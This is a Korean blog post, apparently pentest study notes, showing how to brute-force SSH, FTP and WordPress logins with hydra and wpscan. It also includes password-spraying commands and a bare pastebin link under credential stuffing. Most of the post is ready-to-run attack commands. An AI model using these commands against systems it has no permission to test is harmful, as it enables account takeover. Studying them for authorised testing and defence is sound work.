hydra를 많이 씀.
hydra의 장점은 ssh, ftp, http 등등 여러 서비스에 공격을 할 수 있다는 점.
ssh나 ftp
hydra를 통해 ssh (22번 포트를 공격할 때)
hydra -L users.txt -P pass.txt ssh://ip -V -s 22
-V 옵션을 주면 어떤 과정으로 공격이 진행되는 지를 볼 수 있음.
-s 22 처럼 포트 번호는 안 줘도 되지만 주는 게 더 좋음.
hydra를 통해 ftp (21번 포트를 공격할 때)
hydra -L users.txt -P pass.txt ftp://ip -V -s 21
http
ssh나 ftp 같은 경우는 그냥 원라인으로 hydra를 통해 브루트포스가 가능하지만
http는 준비해야할 것이 있음.
- 어떤 url에서 로그인을 하는가를 알고 있어야 함.
그리고 burpsuite를 통해 패킷을 잡아서 어느 엔드포인트에서 로그인을 하는지, 어느 메소드를 쓰는지
어느 파라미터를 쓰는지를 체크 해야함.
ex)
엔드포인트 : wp-login.php
메소드 : POST
파라미터 : log, pwd
에러메시지를 확인해야 함. : Invalid username.
서비스에 따라 여러번의 bruteforce를 진행해야할 수도 있음.
hydra -L user.txt -p randompassword ip -s port http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid -V
:F를 통해 Invalid가 나오면 실패한거야 라고 컴퓨터에게 알려줌.
그 후에 username을 획득 후 한 번 더 password에 대해 hydra를 진행하면 됨.
wpscan
wpscan을 쓰면 알아서 username 먼저 찾아 주고 그 다음 password 브루트포스를 진행해주는 툴이다.
wpscan --url http://ip:port --passwords pass.txt
- 브루트포스
> hydra -L users.txt -P pass.txt ssh://<ip> -V -s <port>
> hydra -L users.txt -P pass.txt <ip> -s <port> http-post-form "/<endpoint>:username=^USER^&password=^PASS^:F=<error-message>" -V
- 비밀번호 스프레이
> hydra -L users.txt -p 'Winter2023!' ssh://<ip> -V
> hydra -L users.txt -p 'password1' ssh://<ip> -V
- 크리덴셜 스터핑
> https://pastebin.com/gqZZQqsh:v8PupCipie
- 디폴트 계정
'해킹 > 호스트 기반 모의해킹' 카테고리의 다른 글
[ 호스트 기반 모의해킹 ] 해시크래킹 (0) | 2023.11.02 |
---|---|
[ 호스트 기반 모의해킹 ] 윈도우 - 파워쉘 인 메모리 실행 (0) | 2023.11.01 |
[ 호스트 기반 모의해킹 ] 후속 공격 - 리눅스 #2 권한 상승 공격 (0) | 2023.10.20 |
[ 호스트 기반 모의해킹 ] 리버스 쉘 업그레이드 (0) | 2023.10.18 |
[ 호스트 기반 모의해킹 ] 후속 공격 - 리눅스 #1 정보 수집 방법 (0) | 2023.10.17 |